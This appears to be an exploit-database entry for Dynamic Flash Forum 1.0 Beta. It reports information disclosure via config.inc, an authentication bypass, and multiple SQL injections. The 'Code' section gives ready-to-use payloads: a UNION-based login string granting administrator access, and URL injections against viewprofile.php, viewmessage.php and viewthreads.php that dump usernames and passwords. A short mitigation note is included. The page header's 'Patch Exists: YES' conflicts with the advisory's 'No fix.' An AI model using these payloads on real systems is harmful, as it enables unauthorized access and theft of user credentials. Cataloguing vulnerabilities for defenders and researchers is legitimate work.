header-logo
Suggest Exploit
vendor:
Dynamic Flash Forum
by:
Salvatore 'drosophila' Fresta
7.5
CVSS
HIGH
Information Disclosure, Authentication Bypass, Multiple SQL Injection
200, 287, 89
CWE
Product Name: Dynamic Flash Forum
Affected Version From: 1.0 Beta
Affected Version To: 1.0 Beta
Patch Exists: YES
Related CWE: N/A
CPE: a:dynamic_flash_forum:dynamic_flash_forum:1.0_beta
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2009

Dynamic Flash Forum

This file contains reserved informations such as the username and the password for connecting to the database. Using .inc extension only, the content is visible. This bug allows a guest to bypass the authentication system and to login with administrator privileges. This bug allows a guest to execute arbitrary queries.

Mitigation:

Ensure that the magic_quotes_gpc is set to 'on' and that the .inc extension is not used for files containing sensitive information.
Source

Exploit-DB raw data:

*******   Salvatore "drosophila" Fresta   *******

[+] Application: Dynamic Flash Forum
[+] Version: 1.0 Beta
[+] Website: http://df2.sourceforge.net/

[+] Bugs: [A] Information Disclosure
          [B] Authentication Bypass
          [C] Multiple SQL Injection

[+] Exploitation: Remote
[+] Date: 09 Apr 2009

[+] Discovered by: Salvatore "drosophila" Fresta
[+] Author: Salvatore "drosophila" Fresta
[+] Contact: e-mail: drosophilaxxx@gmail.com


*************************************************

[+] Menu

1) Bugs
2) Code
3) Fix


*************************************************

[+] Bugs


- [A] Information Disclosure

[-] File affected: config.inc

This file contains reserved informations such as
the username and the password for connecting to
the database. Using .inc extension only, the 
content is visible.


- [B] Authentication Bypass

[-] Requisites: magic_quotes_gpc = off
[-] File affected: login.php

This bug allows a guest to bypass the authentication
system and to login with administrator privileges.


- [C] Multiple SQL Injection

[-] Requisites: magic_quotes_gpc = off
[-] File affected: viewprofile.php, viewmessage.php,
viewthreads.php

This bug allows a guest to execute arbitrary 
queries.


*************************************************

[+] Code


- [A] Information Disclosure

http://www.site.com/path/config.inc


- [B] Authentication Bypass

Username: -1' UNION ALL SELECT 'password', 1, 'Administrator' FROM users%23
Password: password


- [C] Multiple SQL Injection

http://www.site.com/path/viewprofile.php?userID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL FROM users%23

http://www.site.com/path/viewmessage.php?threadID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)),NULL,NULL,NULL FROM users%23

http://www.site.com/path/viewthreads.php?boardID=-1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,GROUP_CONCAT(CONCAT(username, 0x3a, password)) FROM users%23


*************************************************

[+] Fix

No fix.


*************************************************

# milw0rm.com [2009-04-09]